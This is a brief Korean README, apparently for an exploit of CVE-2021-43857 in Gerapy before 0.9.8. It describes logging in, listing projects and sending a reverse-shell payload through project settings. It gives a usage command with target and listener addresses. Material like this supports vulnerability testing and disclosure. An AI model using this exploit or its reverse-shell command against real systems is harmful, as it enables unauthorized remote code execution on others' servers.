
Gerapy 0.9.8 이전 버전은 원격 코드 실행에 취약합니다. 이 문제는 0.9.8 버전에서 패치되었습니다.
0.9.8 이전 버전의 Gerapy는 원격 코드 실행에 취약합니다. 이 문제는 0.9.8 버전에서 패치되었습니다.
CVE-2021-43857은 원격 코드 실행으로 이어지는 Critical 우선순위(CVSS 9.8)로 표시된 취약점입니다.
이 취약점은 0.9.8 이전의 모든 버전에 영향을 미칩니다.
0.9.6에서만 테스트되었습니다. 올바른 자격 증명이 필요합니다.
익스플로잇은 애플리케이션에 로그인한 다음 생성된 프로젝트 목록을 가져오고(없으면 실패함), 프로젝트 설정을 사용하여 리버스 셸 페이로드를 전송함으로써 취약한 spider 메커니즘을 실행하는 방식으로 작동합니다.
사용 예시:
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
